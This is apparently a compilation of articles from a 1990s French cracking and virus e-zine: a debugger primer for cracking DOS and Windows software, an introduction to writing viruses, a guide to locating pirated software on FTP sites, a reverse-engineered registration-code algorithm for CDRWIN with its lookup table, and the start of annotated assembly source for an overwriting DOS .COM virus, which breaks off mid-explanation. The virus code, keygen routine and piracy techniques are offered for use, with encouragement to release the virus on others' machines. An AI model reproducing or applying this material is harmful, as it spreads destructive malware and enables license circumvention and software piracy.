 Macrovision des cassettes video. C'est vrais quoi !  dejà 3 pages pour parler
 de çà,c'est plutot balaise,en fesant trainer le sujet et tout et tout ...
 Si vous voulez un article plus long,moi je veux bien  je peux vous parler
 du chien de ma grand-mère qui est presque aussi malade quelle,ce qui est dejà
 tres grave,vu son etat. Si on fait rien,il va mourrir  le pauvre ... A mon
 avis,faudrais penser a la piquer, la grand-mère, sinon,il va pas survivre le
 pauv' ptit toutou ... 
 Ok,OK ! j'arrete !!!
 Et que cet article ne vous serve pas a copier les cassettes copyrightées !!!

                                                       MAD666
                                                        
*******************************************************************************


                       +------------------------------+
                       ¦       Debuter en Crack       ¦
                       ¦       Dos ou Windows ?       ¦
 +---------------------¦             par              +---------------------+
 ¦                     +-------SaMSoN-[Mj13/Dsk]------+                     ¦
 ¦                                                                          ¦
 ¦                    A tous les combattants de l'ombre                     ¦
 ¦                    J'adresse un message d'espoir                         ¦
 ¦                    Pour que leur Fronde                                  ¦
 ¦                    Se transforme un jour en victoire!                    ¦
 ¦                                                Molodoi.                  ¦
 ¦                                                                          ¦
 ¦                     +------------------------------+                     ¦
 ¦                     ¦ 1. Introduction              ¦                     ¦
 +---------------------¦ 2. Les points communs        +---------------------+
                       ¦ 3. Specificites Dos          ¦
                       ¦ 4. Specificites Windows      ¦
                       ¦ 5. Conclusion                ¦
                       +------------------------------+



 +-----------------+                                                       
 ¦ 1. Introduction +---------------------------------------------------------
 +-----------------+ 
   On m'a souvent pose la question:"Pour debuter en crack, par quoi je dois
 commencer: Dos ou Windaube ?". Et la, je me suis trouve tres con pour expli-
 quer en deux mots ce que j'en pensait. Voila donc un petit article pour cla-
 rifier les choses.


 +-----------------------+
 ¦ 2. Les points communs +---------------------------------------------------
 +-----------------------+
   Softice (debugger Dos) et Winice (debugger Win) ont le meme look, a deux
 trois details pres, peu importants.
   Softice est en mode 16 bits alors que Winice 95 est en mode 32 bits, ce
 qui modifie un poil les mnemoniques, mais franchement, ca change pas grand
 chose pour nous.
   Le code source est toujours en Assembleur (Saint Langage qui en rebute
 plus d'un :). Au niveau des instructions pour les debuggers, elles restent
 souvent identiques en ce qui concerne les breakpoints, les editions de regi-
 stres, la modification du code source, etc...
   On retrouve encore le loader qui permet de debugger un soft des le debut
 de son code source: Wldr sous Win et Ldr.exe pour Softice.

 Une petites correspondance des principales touches de fonction Softice/Win-
 ice:
     Action           Winice           Softice
   -------------------------------------------
   Trace over          F10              F8 (p)
   Trace in            F8               F7 (t)
   Relance du soft     F5               F9
   jusqu'a BP
   Changement          F6               F12
   Code/instructions
   Voir ecran en       F4               RS
   cours
 Avec Softice, vous pouvez reconfigurer les touches avec l'instruction FKEY.
 sous Winice, j'ai pas verifie, mais ca doit etre possible.


 +---------------------+                                                       
 ¦ 3. Specificites Dos +-----------------------------------------------------
 +---------------------+
   Un des principaux avantages de Softice, est qu'on peut faire un Breakpoint
 "a la volee": un petit Ctrl-D et hop! directement dans le code source du
 programme debugge a l'endroit ou il est rendu (pour Windows, voir 3). C'est
 tres pratique: par exemple, on peut faire un BP juste avant la demande de
 code pour pouvoir ensuite faire du pas a pas et mieux isoler la routine...
   Une autre specificite DOS, c'est qu'on peut mettre des Breakpoints sur les
 interruptions (BPINT) ce que l'on peux faire sous Win, mais qui me semble
 inutile (euh, si je me trompe --> email!).


   Passons aux problemes qui peuvent se poser sous Dos.

   Vous avez cracke un soft, vous recherchez les chaines hexadecimales et
 vous ne les trouvez dans aucun fichier! C'est probablement que le fichier
 est compresse: le fichier se decompresse "en route" pour gagner de la place
 et faire chier les crackers debutants. Il existe des compresseurs d'executa-
 bles classiques: Lzexe, Pklite, Diet, etc... Dans ce cas la, il faut utili-
 ser un decompresseur: UNP 4.11 (cardware) est celui que j'utilise le plus
 because il reconnait un grand nombre de formats. MAIS cela ne marche pas
 pour tous les softs. En effet, certaines boites utilisent une compression
 "maison", qui n'est pas reconnue par Unp ou un autre du meme style. La, pas
 de mystere, il faut utiliser un patch resident. Un resident, c'est un petit
 programme qui se charge en memoire qui modifie le programme pendant son exe-
 cution en memoire et qui permet de le patcher. Vous pouvez en faire vous me-
 me en asm ou utiliser Spoke (freeware) qui est un residant configurable as-
 sez efficace. Mais j'aborderai surement le cas des residents dans un pro-
 chain article.

   L'un des principaux emmmerdements sous Dos sont les programmes en mode pro
 tege: les fameux DOS4GW et autres. Je ne suis pas un maitre de ces trucs,
 mais en gros il permettent de faire un programme en 32 bits en s'affranchis-
 sant des problemes de memoire specifiques au Dos (merci Billou!). Le proble-
 me, c'est que Softice ne supporte pas du tout les programmes qui utilisent
 le mode protege. Alors il faut utiliser Watcom Debugger pour les softs qui
 utilisent le DOS4GW, et ce debugger, c'est pas un modele de puissance. Une
 autre astuce consiste a passer par une session Dos de Windows95. La, c'est
 un peu long a expliquer ici (surtout que je ne masterise pas du tout le
 mode protege, je n'ai que quelques "astuces" :( ) J'essairai donc (ou un
 autre membre, de vous donner quelques trucs dans un prochain article.


 +-------------------------+
 ¦ 4. Specificites Windows +-------------------------------------------------
 +-------------------------+
   La principale difficulte presentee par le debugging sous Windows, c'est la
 pose des Breakpoints. Sous Dos, un Ctrl-D et vous etes dans le code source,
 en direct. Sous Windows (3.x ou 95), quand vous faites un Ctrl-D, vous avez
 1/13223145456677656^32 chance de vous retrouver a l'endroit ou vous voudriez
 etre: a l'endroit precis du code source ou en est le programme a cracker.
 Vous etes dans des putains de procedures Windows, a cause du multitache. Et
 ca, ben c'est deroutant au depart.
   Donc, la solution c'est de poser des Breakpoints sur des procedures Win u-
 tilisees par le programme, le plus proche possible de l'endroit a debugger.
 Par exemple, pour une boite de dialogue a supprimer, un "BPX DIALOGBOXPARAM"
 peut s'averer pas mal. Pour une "messagebox", un petit "BPX MESSAGEBOX" a
 des chances de vous aider. Et il y en a une sacree tripotee de fonctions
 Windows!
   Une autre solution, c'est de debugger le programme a partir du debut avec
 Wldr si le soft a deplomber s'y prette (boite de dialogue au lancement).

   Mais ces fonctions de Windows ont un avantage: elles simplifient le code
 source du programme, ce qui fait que tres souvent, les procedures d'enregis-
 trement, sans etre identiques, se ressemblent (mais vous inquietez pas, sous
 Windows aussi, y'a des programmeurs vicieux). Cela permet surtout d'acquerir
 certains reflexes en voyant des suites d'instructions qui sautent aux yeux
 une fois qu'on a un peu d'experience.

   Ah, oui, j'oubliais: pas la peine d'essayer de cracker des softs program-
 mes avec Visual Basic avec Winice. Vous pouvez reconnaitre ces softs parce
 qu'ils demandent les dll Vbrun100, Vbrun200,etc... En effet, les fichiers
 .exe de ces softs ne sont que des appels aux fonctions contenues dans les
 DLL si bien que vous vous retrouvez dans des boucles a la con en permanence.
 La seule solution qu'il y ait a ma connaissance soit un decompilateur speci-
 fique aux progammes Visual Basic, mais je n'ai pas approfondi. Mais ne vous
 inquietez pas: 999/100, les programmes Visual Basic, c'est de la daube :).


 +---------------+                                                       
 ¦ 5. Conclusion +-----------------------------------------------------------
 +---------------+
   Une conclusion? Merde, qu'est ce que je vais bien pouvoir leur dire ???
 Ce article etait surtout fait pour donner une idee generale de la difference
 entre debugger sous Dos et sous Windows. Bien que Windows puisse faire peur
 au depart, c'est a mon avis injustifie. Il faut s'y faire au depart, mais ca
 reste assez logique dans l'ensemble et pas forcement plus dur a debugger que
 sous DOS ou il n'y a pas deux programmes qui se ressemblent. A part ca, ben,
 comme d'habitude: accrochez vous! Moi il m'a quand meme fallu pas mal de
 temps pour faire mon premier crack a peu pres propre.

   Pour me contacter, voyez mon autre article.

                                                        +-------------------+
 -------------------------------------------------------¦ Samson [Mj13/Dsk] ¦
                                                        +-------------------+
                       +------------------------------+
                       ¦ Initiation au VIRUS, cours 1 ¦
 ----------------------¦             par              +----------------------
                       +--<< :)---> UnK MnemoniK :)>--+



     )> Quelques notions de base
     ---------------------------

     Avant toutes diffusions de parties ou de sources de virus , j'ai tenu a 
     mettre deux trois choses au point 

     1> Qu'est-ce qu'un virus ??? 

     << Ohhh mon dieux >>, c'est ce que j'ai entendu depuis que j'en fais ,
     cependant un virus ne signifie pas la mort du systeme ,
     ni le chaos total du diskque dur (ni la perte de la fat )
     Les virus sont a la base des simples programmes mignon tout plein,
     s'auto-copiant sans avertir l'utilisateur , comme une bacille ,
     son but principal est de se reproduire une fois ce but atteint ,
     le virus fera quelques actions au bon vouloir du programmeur qui
     l'as conçus.

     types de virii : j'en ai classé (:Virii , pluriel de virus)
             
             1) Les recover-virus : ces virus ont pour originalitée d'être très 
             petit mais aussi très cons car ils réécrivent leurs codes sur les 
             progs sans tenir compte du programme lui meme , ca tourne tout le
             temp au plantage royal et l'user vas donc lancer l'a-v , le plus
             c'est que le programme infecté est irrécupérable

             2) Les résidents : ce sont les plus beau a mon avis , ce sont des 
             programmes qui peuvent agir en arrière plan , ils sont lancé a 
             partir d'un virus executable , une fois en mémoire , le virus peut
             se copier a son gré tenant tout de fois compte de ne pas géner 
             l'user,ce qui rend ces virus extremement contagieux ,imaginez vous
             entrain de faire un dir , la , innocamment , le virus vient
             d'infecté 3 nouveaux fichiers , au bout de 10 minutes passée sous
             dos , un disque peut etre TOTALEMENT infecté sans que l'user ne
             s'apercoive de quoiquesesoit.

             3) Les infecteurs d'executable :ces virus s'attachent au programme 
             lui meme , ils se copient et puis repasse le controle au programme 
             démandé , mode de propagation très répendu car assez facile a 
             rélaiser .

             4) les infecteur du boot :ces virus s'écutent au lancement du boot
             ce mode de propagation est assez intéréssant du fait qu'il n'est
             pas dérangé par le systeme d'exploitation , donc il infectera un
             systeme unix aussi bien qu'un system os/2 aussi bien qu'un systeme
             dos.

             5) Divers : Toute une rimbabelle de virus se sont spécialisés dans 
             divers style , par exemple des virus infecte des fichiers doc 
             (comment ??? : simple , les fichiers doc contiennent des progs ,
             car on peut attacher des progs a un doc grace aux ole , je salue 
             celui qui en a eu l'idée ) , ya aussi les vers , virus qui se 
             balladent dans les réseaux , des infecteurs de fichiers OBJ,Sys...

     2> Creer ses virus

     pourquoi creer son virus ??? Les virus que vous pourrez trouver seront
     détéctable , bref > ca termine en couille . Les virus créé par des
     générateurs sont tous reconnus et meme leur variente , bref > ca sert
     a rien je voudis. Le seul moyen de distribuer un virus est de le creer
     soi meme ; 
     -Oui mais comment on fait ?( avec la voix naze )
     Il faut les programmers en assembleur
     -Oui mais moi je connais que le basic
     c'est con ca car pour pouvoir faire un virus dans des conditions
     acceptable, il faut un language de très bas niveau , l'assembleur
     s'impose , les autres languages  genre deplhi , pascal ,... ne sont pas
     dutout adapté a ce genre de manipulation ,ceci dit j'en ai deja vu en C
     et en C assembleur mais très rares sont-ils.
     -Ok , l'assembleur ca se mange comment ?
     L'A86 est un compilateur shareware , mais il est très peu utilisé dans les
     virii qui sont le plus souvent compilé en TASM (<^²=- WaReZ oblige -=²^>)
     -C'est dur a faire ?
     Non c'est pas dur , bien sur , vous ne ferez pas des gros masterboot tout
     de suite , je vous montrerais des Executables et chaque fois une nouvotée
     pour l'améliorer , des routines intéréssente , etcetc 
     -Et si je veux le tester mes virus ???
     faites le sur des bornes isolées , le vieux 286 du grenier avec son disque 
     de 40 megs fera l'affaire , de cette manière , vous pourrez toujours 
     controler votre virus (comme dans les films , 1 virus laché dans la nature
     si il est très contagieux sera totallement incontrolable )

     Tips: - J'utilise le norton commander du dos, ca facilite bocoup l'édition
     de ces virus , - lisez les issues 1-14 de 40Hex et ceux de VLAD , ils sont
     très pointus sur les nouvelles manières d'infections mais ils fournissent
     les codes Hexa et assembleur de virus (: , In Inglich  ,,, - vous pouvez
     toujours reprendre des sous-fonctions pour autant que celle ci ne soient
     dans les premiers octets du virus car ceux-ci sont utilisés pour la
     désinfection .

     About Me 
     --------

     Je traine souvent sur le net , si vous etes sur aol , lancez un méssage
     éclair à
     VGeNeRaLV  , sinon je passe mon temp sur kali a jouer sous le nom de
     General3 , je suis parfois sur l'IRC mais très rarement , sur L'udernet .

     Mail me at : zorohack@hotmail.com

     DédiKaCEs: Faucon , Uther , Stork , Aries , Fade , Knuck , Till , Flavor ,
     Lithium , SoS , Arnold , JAYCEuWZ , HxMajor , WzEuRoPe , Jayce , Yak ,
     HuMaNBOmb , 
     Magic , Pablo ,  Zak , Znel , Marave , Mana , Cybertech et toute la clique

     Prochain episode : un recover-virus comme il faut

                                                     << :)---> UnK MnemoniK :)>
*******************************************************************************

              Comment débusquer les warez sur le net en 10 leçons

                Ecrit-a-la-va-vite-parce-que-j'ai-pas-le-temps.

                                       par

                                      Shybe
*************************************       ************************************
  Je vais donc énoncer dans ce document les methodes les plus connues
pour trouver facilement ce qui est le plus croustillant pour nous: les warez.

1) Introduction:

 Il n'y a pas si longtemps, Internet était un réseau réservé aux
professionnels. On ne trouvait pratiquement que des données
scientifiques.
De nos jours toutes sortes de bidochons se baladent sur le Web et
Internet est en train de devenir un merveilleux foutoir ou l'on trouve
pratiquement ce qu'on veut. Le probleme est de savoir OU trouver ce qui nous
interesse.
  D'abord un peu de vocabulaire pour les débutants:

-Warez: Terme désignant un logiciel croustillant. C'est à dire
        sympa, cool, interessant, registered, pompable, jouable et nouveau.

-Appz, Gamez, Sitez: termes désignants respectivement: Applications
                     warez, Jeux warez, Sites FTP warez
 (ne riez pas y'en a qui ne comprenent pas bien l'anglais.)

-Oldiez ou Oldies: Généralement les vieux jeux et applications.

-"This site sucks!": "Ce site suce!" ou "ce site est nul!"
                     géneralement écrit par quelqu'un qui vient de fouiller
                     sur un site FTP sois-disant warez et qu'en fait le site
                     est vide ou ne contient que des oldiez ou des merdes.
                     Si vous voyez ca dans un site FTP warez, il y a fort
                     a parier que le site ne vaut pas un clou.

-"Fuck U lamerz!": "Allez vous faire enculer, bande de morveux!"
                   Ou plus exactement un message d'injure d'un Elite
                   (vois plus loin) qui grogne parce qu'il n'a pas
                   trouvé son bonheur dans un site FTP dit warez.

-"Empty site!": Site vide. Ne contient rien ou que des merdes.

-"Loaded site!": "Site rempli!"
                 Dit d'un site lorsqu'il contient des warez.

-"Fat ass site!": "Site warez gros cul!" ou "site 'poid-lourd!'"
                  En gros: YA BON. Terme généralement utilisé par unElite
                  qui a trouvé un site FTP warez fantastiquement bourré
                  de warez. Donc a essayer en premier.

La société sur le net par ordre croissant d'importance:

-Lamerz: On est dit lamer lorsqu'on pompe par exemple impunément 20 mo
         de warez sur un site FTP sans envoyer quoi que ce soit.
         Sur le net, tout le monde traite tout le monde de lamer.
         C'est en fait une espece de coutume.
         Un lamer est en fait un synonime péjoratif de "débutant".

-Trader: Un gars appartenant a un "groupe de warez" (distributeur de warez
         payant ou pas) qui est chargé de vendre ou d'échanger les warez.
         Les traders sont en général considérés de haut par les "élites"
         (voir ci-dessous) car ils se tapent le sale boulot.
         Ce sont en fait des "dealers" de warez.

-Elite: Un bien grand mot pour désigner les pros, la "haute société" de la
        micro dans les coders, crackers et autres
        hackers. On est generalement dit élite lorsqu'on fait partie d'un
        groupe de traders. Les gars qui se disent élite sont dans 90% des cas
        des craneurs qui aiment dire "j'ai des warez et j'en ai autant que
        j'en veux." dans les newgroups.
        Remarque importante: Les 10% de vrai "membres élite" ne parlent
        JAMAIS d'eux et ne se font pas remarquer.
--> Dans la pratique, un élite est un type capable de débusquer SOIS-MEME ses
    warez sans être obligé de pleurer dans les chaussettes d'un autre type
    qui, lui, le peut. (Ce que nous avons tous fait dans nos débuts)
    Nous désigneront donc courrament un élite un gars qui cherche des warez.


II Methodes de recherche:

  1) FTPsearch 3.3:
  -----------------

  Lorsque j'ai commencé a cherche des warez sur le net, j'ai d'abord utilisé
les moteurs de recherches connus (Alta-vista, Yahoo...). Je me suis vite
rendu compte qu'il existait des milliers de sites WWW contenant des listes
de sites FTP warez. Malheureusement, je me suis aussi vite rendu compte que
beaucoup n'était pas à jour, ou que les FTP ne marchaient plus.
Il m'a donc fallu chercher d'autres moyens de trouver des sites frais.
Un jour j'ai entendu parler de FTP-Search 3.3. (ftpsearh.ntnu.no)
FTP-Search est surement le moteur de recherche de FTP le plus puissant
sur le net: Il suffit de chercher un mot clef, et s'il trouve ce mot
DANS L'ADDRESSE d'un site répertorié, hop on a la réponse.
Il est donc facile, en théorie de trouver des sites warez! Il suffirait
de chercher des noms de repertoires se trouvant courrament dans les sites
pour tomber sur les warez. Le seul probleme, et de taille, c'est que
FTPsearch garde souvent en liste des sites périmés. On a donc souvent
l'IMPRESSION trompeuse d'avoir trouvé LE site qui booste et qui tue,
mais en fait si on veut pomper, ou même simplement acceder REELLEMENT au site
(avec un client FTP), eh ben ça marche presque jamais!
(comme par exemple ftp.gpl.net, un site qui A existe il y a quelque temps,
et qui contenait un gros morceau, mais qui a malheureusement fermé!)
FTPsearch garde en memoire le contenu des sites A UN MOMENT DONNE, ce qui
fausse completement l'idée qu'on peut avoir de son véritable contenu!
(Voir des fichiers qui n'existent plus depuis longtemps, ou encore
ne pas voir des fichiers qui viennent d'apparaïtre!)

IL EST DONC IMPERATIF, AVANT TOUT EXCITATION SOUDAINE, de VERIFIER
l'état du site: en pratique cliquer sur l'addresse complete en bleu dans
FTPsearch.
(avec netscape ou explorer)
Si le site ne répond pas, c'est rapé. S'il répond, vous pouvez commencer
à en pisser de joie.

Pour une recherche aisée, il faut savoir bien configurer FTPsearch:
1) Passer en mode "expression match"
   (donne une simple liste contenant uniquement les mots-clée se rapprochant
le plus du votre, pratique pour trier rapido)

2) Régler l'ordre d'affichage de façon à avoir la taille VISIBLE (en premier
   par exemple. C'est important: ca permet de trier rapidement les fichiers
   en fonction de leur taille: si vous trouver un "quakefull.zip" qui fait
   3 ko par exemple, on peut être sur que ça n'est pas la commerciale!

3) Régler l'ordre d'affichage sur "date, host and name" de façon a avoir
   les sites les plus récents (et donc les plus susceptible de contenir
   quelque-chose) en HAUT de la liste.

4) SAUVEGARDER LA CONFIG! (sinon rebelotte, et c'est chiant a la longue)

--> Je vais maintenant faire une liste non exaustive des mots clefs les
plus
    utilisés dans les sites, ou dans les noms de répertoires:
    ( "_" désigne un ESPACE )

    .wrz
    wrz
    .apz
    apz
    .warez
    warez
    .appz
    appz
    .gamez
    gamez
    .sitez
    sitez
    .oldiez
    oldiez
    .reqz
    reqz ou reqs ou required
    serialz
    crackz
    stuffes ou stuffz

    iRC       )
    iRC96     ) ou .iRC???
    iRC'96    )
    .nwc ou .NwC ou NwC etc...
    fate96
    risc

    ...
    _.
    _..
    _...
    etc...

    Il est aussi intelligent de chercher:

    uploaded by
    upload by
    upped by    (le plus courrant)
    up by
    reqz filled by
    filled by

    Ou pour des warez amiga:
                   ------
    amiga-warez
    amiwarez
    .amiwrz
    amiwrz
    aaa
    a-warez

Regardez dans les répertoires:

    .unreadable
    unreadable
    test (je sais y'en a beaucoup, mais ca vaut le coup!)
    .temp
    temp

--> Les groupes de warez: nous recherchons ici les fichiers communs
    acompagnant les warez en général:

    fate.nfo      |   irc96.nfo
    fate96.nfo    |   razor.nfo
    ror.nfo       |   risc.nfo
    dod.nfo       |   tdu.nfo
    ucf.nfo       |   tdujam.nfo
    ucf.com /.exe |   tdujam.exe

--> Les extensions de fichiers:

    .arj / .a01 etc...
    .r00 / .r01 etc...
    .000 / .001 (TDUjam)
    .dms (pour les warez amiga)
    .lzx (idem)

--> Les entêtes de fichiers: ( à coupler avec les extensions )

    tdu-*.*
    tdu*.*
    ror*.*
    dod-*.*
    dod*.*
    rsc*.*
    *ucf.*

Le mieux est de chercher des noms de fichiers appartenant a des warez
connues et répandues, par exemple:

    dn3d.*
    dn3d13r.*
    duke3d.*
    duke3dr.*
    quake101.zip ou arj/a01 etc...
    quakefull.*
    z.arj
    psp40.arj ou zip
    psp311r.*
    gw32r.zip (game wizard 32 :)) )
    photoshop.*

Pour les amigafans:
    tvpaint*.lzx
    dpaintV.lzx
    dc-*.*
    et dc-lw4.* ou dc-lw5c.* (lighwave 4 ou 5 bc)
    real3d.*

    etc etc...

Faites jouer votre imagination!
Essayez aussi, si vous cherchez quelque chose de préci, de combiner
entêtes et abrégés, par exemple:
Je cherche Speedy Rom.
Dans ce cas on cherche un peu partout et on trouve dodsprom.zip...

Remarque: les caractères tels que '*' ou '?' ne sont pas reconnus par
FTPsearch. Pour utiliser les notations étendues, vous serez
          obligé d'utiliser la "Regular syntax" qui est différente
          de celle utilisée par DOS.
          Exemples de conversion:

          ?  <=3D=3D>  .
          *  <=3D=3D>  .*

          Vous trouverez un résumé complet de la syntaxe dans l'aide au site
          de FTPsearch, ou en cliquant sur "syntax" qui est en
          surbrillance si mes souvenirs sont bons.

Bon avec ça vous devriez pouvoir trouver à peu près 1 site warez par jour!

  2) Les listes de sites:
  -----------------------

Il est assez facile de trouver des listes de sites warez dans les
répertoires
"sitez" des sites warez déja trouvés. Le probleme, toujours le même:
les mises à jours. Les sites warez ne durant généralement pas longtemps
(1 a 2 jours pour les warez PC et une a deux semaines pour les warez
AMIGA)
il est impératif de trouver des listes contenant des sites datant du jour
même. Pour cela: trois solutions:

      1) De loin la plus facile:
         Aller sur mon site, dans mes linkz, et fouiller dans la section
         "warez FTP listz". Vous trouverez surement 2 ou 3 sites contenant
         des listes de FTP classés par date.
         (certains sont même mis-a-jour 2 ou 3 fois par jour!!!)
         Par exemple: www.netwarez.com, section WAREZ.
         (excellent, ce site, d'ailleur)

      2) Chercher avec FTPsearch ou autre moteur de recherche des fichiers
         genre...

         0-day.txt
         0day.txt
         0daywrz.txt
         0.day
         0day.wrz
         etc...
         ou:
         siteZ.*
         sitelist.*
         sitezlst.* (extensions txt/doc/nfo etc...)

         ...ou même des fichiers comme WS_FTP.INI qui contiennent des listes
         de sites compatibles avec Ws_ftp.
         Si WS_FTP.INI se trouve dans un répertoire zarbi genre _.. ou sitez,
         pas de doute!

      3) Ce qu'on appelle dans notre jargon "trader en IRC"
         C'est-a-dire échanger des listes de sites contre d'autres listes,
         ou des warez.
         Par exemple dans les channels comme #warez666 chez undernet.org,
         on peut souvent trouver des addresses IP de sites appartenant a des
         particuliers... Vous lui envoyez quelque-chose qu'il cherche
         et il vous file l'acces...

III La machine infernale:

  Comme vous avez pu le voir, lorsqu'on trouve un site warez, on trouve aussi
de temps en tmeps des listes d'autres sites FTP. Il est donc assez facide
de maintenir quelques sites toujours à dispo pour trouver ce qu'on veut.

  Le mot de la fin:
J'espere qu'avec tous ces trucs vous trouverez votre bonheur...
Cependant n'oubliez pas que vous n'=êtes pas seul a pomper sur un site
FTP, pensez aux autres: remplissez les "reqz". Perso, je laisse un repertoire
genre Upped by -=3D Shybe =3D- shybe@geocities.com.
Comme ça il arrive qu'on se fasse des potes sur un site, et qu'on
échange des listes etc...


A vos modems

  Amicalement
                                                -=3D S H Y B E =3D-


NB: Désolé pour l'aurtaugraf.


*******************************************************************************
                        | TRACAGE DE CRWIN3.0a |
                        | CREATION DE REGISTER |
                        |         PAR          |
                        |    DONGLE KILLER     |
                        |    ALLIGATOR427      |
******************************************************************************
Voici donc le tracage de CDRWIN 3.0a, qui vous permets de trouver les BPX
du premier coup...
le calcul restera le meme sur toutes les versions suivantes, vous permettant
d'avoir votre registrer... sorry Jeff...
Nous l'avons tracé tous les 2, a des moments et endroits differents...
rendons ces lauriers a cesar, qui a poussé le "vice" en creeant un KEY-REGIS.
Bravo DONGLE!!!
******************************************************************************

0137:00406345	CALL	0043789D
			Renvoie eax=3Dlongueur du nom
0137:00406354	CALL	0043789D
			Renvoie eax=3Dlongueur email
0137:00406363	CALL	0043789D
			Renvoie eax=3Dlongueur code
0137:0040636C   CALL	00424960
			Renvoie eax=3Dvaleur hexa du code
0137:00406378   PUSH    EAX
			Sauvegarde de la valeur du code
			en pile
0137:00406381   CALL	00411E10
                        Vérification du code

Détail de la vérif. :

0137:00411E22	CALL	00412150
                        Vérification si code ok,
			alors eax<>0
--------------------------------------------------------
Détail du CALL 00412150

les adresses du nom, email et code ont été empilée juste
avant l'appel!!

0137:00412150	MOV	EDX,[ESP+04]
			EDX pointe sur le NOM
0137:00412160	REPNZ	SCASB
			On recherche la fin de chaine
		NOT	ECX
		DEC	ECX
			ECX=3DLongueur du nom
		CMP	ECX,06
                        Longueur inférieure =à 6 caracs ?
0137:0041216A	MOV	EBX,[ESp+14]
			EBX pointe sur l'email
....idem : vérif longueur....
--------------------------------------------------------
0137:00412183	PUSH	EDX
			On empile l'adresse du nom
		CALL	004121E0
                        Calcule un code un partir du nom
                        nom= Vous choisirez..
                        eax=xxxxxxxxxxx
		....
		....
		PUSH	EBX
			on empile l'adresse de l'email
		OR 	EDI,ESI
			Inversion de la partie haute=20
			et de la partie basse de eax
			par rotations et addition finale
                        Résultat dans ESI !!!

0137:0041219B	CALL	004121E0
                        Calcule un code à partir de l'email
                        (grace a l'adresse empilée avant)
                        email= vous choissirez!
                        eax=xxxxxxxxxx
		XOR	EDI,EAX
                        OU EXCLUSIF des 2 résulats nom et
			email
                        EDI=xxxxxxxxxx
			en base 10
                        EDI=xxxxxxxxxxx  < le code est la!!!!
La suite récupére la valeur du code saisi qui avait été empilée
bien avant et la compare a la valeur ci-dessus.
--------------------------------------------------------
        #
Routine calcul register :

....détails oubliés....

EBX pointe sur la chaine
ECX =3D longueur chaine
DI  =3D longueur chaine


0137:00419199	XOR	EDX,EDX
			EDX=3D0=20
0137:0041919B	MOV	DL,[EBX]=09
			Lecture premier carac.
			exemple : DL=3D50  carac. 'P'
		INC	EBX
			Pointe sur carac. suivant
		MOV	ECX,EDX
                
		SHR	EDX,02
                        2 décalages à droite sur EDX
			0101 0000 --> 0001 0100 =3D 14
		XOR     ECX,EAX
			OU exclusif entre eax et ecx
			dans ecx.=20
		SHR	EAX,04
                        4 décalages à droite de eax
		AND	ECX,0F
			Et logique sur ECX, on garde les
			4 bits de poids faible
		MOV	ECX,[ECX*4+ESI]
                
		XOR	ECX,EAX
			Ou exclusif entre ecx et eax
		LEA	EAX,[EXCX*4+0000000]
			EAX=3DECX*4
		SHR	ECX,04
                        4 décalages à droite de ecx
		XOR	EAX,EDX
			Ou exclusif entre ecx et edx
		AND 	EAX,3C
			ET logique sur eax
                        bits 5,4,3,2 conservés
		MOV	EAX,[ESI+EAX]
			Lecture d'un code dans une table point=E9e par ESI+EAX
			EAX maxi =3D 3C (cf AND 3C), la table aura donc 16 mots
			de 32 bits
		XOR	EAX,ECX
			Ou exclusif entre eax et ecx vers eax
		DEC	DI
			Test fin de chaine
		JNZ	419199
                        Reboucle si pas la fin de chaine


Table pointée par ESI : (cette table est dans CDRWIN.EXE)
-----------------------
ESI+00 : 00 00 00 00 7E 88 3E 1C
ESI+08 : FC 10 7D 38 82 98 43 24
ESI+10 : F8 21 FA 70 86 A9 C4 6C
ESI+18 : 04 31 87 48 7A B9 B9 54
ESI+20 : F0 43 F4 E1 8E CB CA FD
ESI+28 : 0C 53 89 D9 72 DB B7 C5
ESI+30 : 08 62 0E 91 76 EA 30 8D
ESI+38 : F4 72 73 A9 8A FA 4D B5


ET vala.. comment ca s'est compliqué?????

*******************************************************************************


^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^

Virus exemple N°1           UnK MnemoniK

-----------------


Voila , j'ai essayer de détailler ici un virus très simple et en meme temp
très petit , l'astuce de cette petite taille est que le virus se propage en 
écrasant directement sur le fichier , ne tenant pas compte du programme 
infecté , ici , quand on lancera le fichier , il retournera directement sous
le prompt , bref on s'apercevra assez vite de l'infection , voir que l'on
réinstallera completement les progs infectés , ce virus est déja a moitié 
comdamné , il serait toujours amusant de le lacher sous c:\dos qu'on voie
la tête du technicien informatique ( que perso je n'arrive jamais a pifer ,
genre le type : euuuh ,  ce réseau est optimisé (:ouarf le vocabulaire) pour
Ou-indoze95 , nos plateformes sont à la pointe de la technologie , hum hum
et ne touchez pas a ce clavier ; ou bien le type qui arrive quand tu veux 
t'amuser sur une bécanne de démonstration ou ya un pseudo internet qui en
fait n'est qu'une page html sur le disque ventant les mérites de la compagnie

après ce bref interlude , voici les explications   

**************************************************************************


cette partie n'est que du blabla pour que turbo assembleur ne viennent pas 
raler avec ses gros sabots

-
code            segment
                assume  cs:code,ds:code,es:code,ss:code
                org     100h
main            proc near
-

La routine start a pour but de mettre en 9Eh le nom du premier fichier'*.com'se
trouvant dans ce repertoire grace a la subfonction 4Eh de l'intéruption
21h (celle du dos ) , le fichier n'infectera pas les fichiers cachés ni
ceux en lecture seule , pour cela , il faut placer dans CX un code binaire
00000011B ou 2h 

-
START:
MOV AL,0
MOV AH,4Eh
MOV DX,OFFSET COMFILE
INT 21H
JMP INFECTE				; saut sur le procéssus d'infection  
-

les routines close puis plus ont la fonction de fermer (3Eh) le fichier ouvert 
et de rechercher le prochain fichier com sur le repertoire actuel (4Fh) , 
4Fh n'a besoin d'aucune préparation car elles sont fixée avec 4Eh

-
CLOSE:
MOV AH,3EH
INT 21H

PLUS:
MOV AH,4FH
INT 21H
OR AL,AL
JNZ BYE
-

ici le procéssus d'infection étant très primaire , il se décompose comme 
étant l'anti-réinfecteur et infecteur , je m'explique , il ne faut pas 
que le virus s'écrase tout le temp sur le meme fichier car l'infection
serait impossible puis si le test parait négatif il infecte le fichier

-
INFECTE:
MOV AX,3D02H
MOV DX,OFFSET 9EH
INT 21H
MOV BX,AX
-

/¦\ vous avez ici l'ouverture du fichier , a partir ce moment les actions 
d'écriture lecture sont possible sur le fichier , comme dans le basic
ce fichier est affecté un numéro placé en AX mais ca ne suffit pas car 
pour les prochaines intéruptions , le numéro du fichier doit se trouver
en BX 

-
MOV AH,3FH
MOV CX,2
MOV DX,OFFSET MTEST
INT 21H
CMP WORD PTR MTEST,00B0H
-

routine de test d'infection
comme comparaison , nous allons lire les 2 premiers octets (3Fh) et puis
les comparer avec ceux du virus (ici B000h (ne pas oublier d'inverser les
